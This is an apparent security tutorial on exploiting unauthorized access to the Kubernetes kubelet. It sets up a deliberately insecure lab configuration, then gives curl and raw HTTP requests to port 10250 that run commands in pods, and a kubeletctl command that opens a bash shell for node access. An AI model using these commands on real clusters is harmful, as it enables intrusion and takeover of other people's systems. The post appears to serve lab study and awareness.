0x00 Preface
Unauthorization has always been a common problem, and it is inevitable in cloud security. This article introduces the related unauthorized vulnerabilities of kubelet.
0x01 kubelet basic knowledge
1. Main functions
kubelet is a proxy component on the k8s worker node. Its main functions are:
- K8s interacts, obtains pod-related data, and monitors the time of pod changes.
- kubelet operates the resource information of the current host and starts the pod
2.Port
kubelet will open 4 ports, 10250, 10255, 10248, 4194 (deleted in version 1.12 and managed by 10250)
| port | effect |
|---|---|
| 10250 | The port used by kubelet to communicate with apiserver. It regularly requests apiserver to obtain the tasks it should handle. Through this port, you can access and obtain node resources and status. |
| 10248 | Determine whether kubelet is working properly |
| 4194 | Through this port, you can obtain the environment information of the node and the status of the container running on the node. |
| 10255 | Provides pod and node information. The interface is exposed in read-only form. No authentication or authorization is required to access this port. |
3.kubelet module
0x02 10255 port is not authorized
1.Environment setup
Modify /var/lib/kubelet/config.yaml and add the following content in the last line:
readOnlyPort: 10255
address: 0.0.0.0
Just restart it
systemctl restart kubelet
2.Use
10255 is a read-only port and only involves information leakage issues.
The leaked information includes node information and namespace
startup configuration.
0x03 10250 Unauthorized access
1.Environment setup
Modify /var/lib/kubelet/config.yaml and change anonymous to true
Then change the authentication from Webhook to AlwaysAllow
Just restart it
systemctl restart kubelet
2.Use
First, visit https://192.168.247.156:10250/runningpods/ directly. What needs to be noted here is https
2.1 Command execution
curl -XPOST -k "https://192.168.247.156:10250/run/kube-system/kube-proxy-flbc8/kube-proxy" -d "cmd=whoami"
The first is namespace/podname/containers
You can also directly burp:
POST /run/kube-system/kube-proxy-flbc8/kube-proxy HTTP/1.1
Host: 192.168.247.156:10250
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: sidebar_collapsed=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
cmd=id
2.3 Obtain server permissions
https://github.com/cyberark/kubeletctl
This tool is still so useful
kubeletctl.exe --server 192.168.247.156 -p kube-flannel-ds-jndfl -c kube-flannel -n kube-flannel exec "/bin/bash"You can obtain node permissions by
